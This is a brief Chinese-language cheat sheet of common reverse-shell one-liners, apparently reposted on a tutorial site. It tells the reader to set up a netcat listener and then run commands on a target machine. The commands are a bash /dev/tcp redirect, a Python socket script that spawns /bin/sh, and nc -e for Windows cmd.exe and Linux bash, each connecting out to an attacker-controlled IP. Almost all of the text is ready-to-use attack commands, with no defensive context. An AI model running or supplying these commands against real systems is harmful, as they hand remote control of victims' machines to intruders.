liunx常用反弹

先在服务器监听：nc -lvvp 12345

然后在目标机器执行以下

liunx 客户端机器：

bash -i >& /dev/tcp/ip/端口 0>&1

例：

bash -i >& /dev/tcp/120.120.120.120/12345 0>&1

python：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("100.100.100.100",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

nc -e cmd.exe 100.100.100.100 12345 （Windows）

nc -e /bin/bash 100.100.100.100 12345 （Linux）

来源：https://www.cnblogs.com/kuyeokuye/p/12378446.html

标签

socket

bash

易学教程内所有资源均来自网络或用户发布的内容，如有违反法律规定的内容欢迎反馈！
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!